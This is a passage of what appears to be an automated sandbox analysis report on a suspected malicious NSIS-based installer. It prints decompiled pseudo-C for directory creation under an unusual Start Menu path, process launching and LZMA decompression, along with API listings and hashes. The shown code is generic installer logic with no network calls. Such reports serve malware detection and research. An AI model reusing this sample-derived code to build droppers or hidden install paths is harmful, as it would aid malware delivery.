                                                    0x00401f26
                                                    0x00401f2f
                                                    0x00401f41
                                                    0x00401f43
                                                    0x00401f43
                                                    0x00401f31
                                                    0x00401f37
                                                    0x00401f37
                                                    0x00401f2f
                                                    0x00401f4a
                                                    0x00401f4d
                                                    0x00401f4d
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                      • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                      • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                      • Part of subcall function 00405371: lstrcatW.KERNEL32(00422708,00402EAD), ref: 004053CC
                                                      • Part of subcall function 00405371: SetWindowTextW.USER32(00422708,00422708), ref: 004053DE
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                      • Part of subcall function 004058F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                      • Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928
                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                    • String ID:
                                                    • API String ID: 3585118688-0
                                                    • Opcode ID: bed85edf7af7f9cca6b12dc9acd47f5d38ac300e38b517a0228c362b0a713386
                                                    • Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
                                                    • Opcode Fuzzy Hash: bed85edf7af7f9cca6b12dc9acd47f5d38ac300e38b517a0228c362b0a713386
                                                    • Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C53(0xfffffff0);
				_t17 = E00405C71(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405BF3(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004058BD( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E004058DA(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405840( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406212(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                    0x004015c1
                                                    0x004015c9
                                                    0x004015cc
                                                    0x004015d1
                                                    0x004015d5
                                                    0x004015d7
                                                    0x004015df
                                                    0x004015e1
                                                    0x004015e4
                                                    0x004015ea
                                                    0x00401604
                                                    0x00401607
                                                    0x004015ec
                                                    0x004015ec
                                                    0x004015ef
                                                    0x00000000
                                                    0x004015fa
                                                    0x004015fd
                                                    0x004015fd
                                                    0x004015ef
                                                    0x0040160e
                                                    0x00401615
                                                    0x00401624
                                                    0x00401624
                                                    0x00401617
                                                    0x0040161a
                                                    0x00401622
                                                    0x00000000
                                                    0x00000000
                                                    0x00401622
                                                    0x00401615
                                                    0x00401627
                                                    0x0040162b
                                                    0x0040162c
                                                    0x004015d7
                                                    0x00401634
                                                    0x00401663
                                                    0x0040224b
                                                    0x00401636
                                                    0x00401638
                                                    0x00401645
                                                    0x0040164d
                                                    0x00401655
                                                    0x0040165b
                                                    0x0040165b
                                                    0x00401655
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                      • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30,75F23420,?,75F22EE0,00405A23,?,75F23420,75F22EE0,00000000), ref: 00405C7F
                                                      • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                      • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                      • Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac,?,00000000,000000F0), ref: 0040164D
                                                    Strings
                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 00401640
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac
                                                    • API String ID: 1892508949-3132586757
                                                    • Opcode ID: a0907c63560d2ac9fa112a8739cad52727823e3ba423b8981b09297004b600fc
                                                    • Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
                                                    • Opcode Fuzzy Hash: a0907c63560d2ac9fa112a8739cad52727823e3ba423b8981b09297004b600fc
                                                    • Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004052E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E004052E5(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423714 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423714 = _t16;
							E00404CBB();
						}
						L11:
						_t9 = CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C3B(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404322(0x413);
				return 0;
			}






                                                    0x004052e9
                                                    0x004052f3
                                                    0x0040530f
                                                    0x00405331
                                                    0x00405334
                                                    0x0040533a
                                                    0x00405344
                                                    0x00405345
                                                    0x00405347
                                                    0x0040534d
                                                    0x0040534d
                                                    0x00405357
                                                    0x00405365
                                                    0x00000000
                                                    0x00405365
                                                    0x0040531c
                                                    0x00405354
                                                    0x00405354
                                                    0x00000000
                                                    0x00405354
                                                    0x00405328
                                                    0x0040532a
                                                    0x00000000
                                                    0x0040532a
                                                    0x004052f9
                                                    0x00000000
                                                    0x00000000
                                                    0x00405300
                                                    0x00000000

                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00405314
                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405365
                                                      • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$CallMessageProcSendVisible
                                                    • String ID:
                                                    • API String ID: 3748168415-3916222277
                                                    • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                    • Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
                                                    • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                    • Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004058F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004058F2(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426730->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                    0x004058fb
                                                    0x0040591b
                                                    0x00405923
                                                    0x00405928
                                                    0x00000000
                                                    0x0040592e
                                                    0x00405932

                                                    APIs
                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                    • CloseHandle.KERNEL32(?), ref: 00405928
                                                    Strings
                                                    • Error launching installer, xrefs: 00405905
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcess
                                                    • String ID: Error launching installer
                                                    • API String ID: 3712363035-66219284
                                                    • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                    • Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
                                                    • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                    • Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406D0F Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 99%
                                                    			E00406D0F() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M0040717D))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
